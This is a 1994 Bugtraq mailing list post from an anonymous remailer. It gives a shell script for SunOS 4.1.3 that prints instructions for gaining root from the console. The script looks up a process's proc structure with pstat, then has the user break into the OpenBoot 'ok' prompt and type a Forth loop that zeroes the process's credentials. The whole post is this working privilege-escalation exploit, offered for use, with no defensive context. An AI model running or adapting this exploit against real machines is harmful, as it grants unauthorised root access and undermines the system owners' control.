Bugtraq mailing list archives

Re: Breaking in from the monitor at the console


From: an100188 () anon penet fi (an100188 () anon penet fi)
Date: Sat, 28 May 1994 10:15:52 UTC


Oops, someone pointed out that the script was deleted by the anonymous
mail signature-remover.  Sorry about that.  Here's the script:
 
#!/bin/sh -  
# Program: fc-4.1.3
# Author: Anonymous
# Usage: fc-4.1.3 PID
#       PID is the PID of the shell you wish to give root to.
#
# Description:
#       Tell people how to give themselves root (on SunOS 4.1.3 machines)
#

# Give the program a known path
PATH="/bin:/usr/etc:/usr/ucb"
export PATH

if [ $1x = x ]; then  
cat - << EOF
Usage: $0 PID
        Where PID is the PID of the shell you want to give root to.

Note - for csh the PID is stored in \$\$.
EOF
        exit 1
fi

# This is the start of the proc structure for a given PID.
procp=`pstat -u $1 | grep procp | cut -f2`

# This is really the only important information here.
# This number is the offset of the pointer to the cred structure  
# in the proc structure.
ucred="4c"

cat - << EOF
On the console press '<L1>a', you should then see the following message:
        Type  'go' to resume
        ok  

type the following at the 'ok' prompt:
        b 2 do 0 $procp $ucred + l@ i + w! 2 +loop
        go

Notes:  
        * On some sun keyboards the '<L1>' key is labeled 'Stop'.
        * There is Emacs style line editing available at the 'ok' prompt.
EOF

exit 0


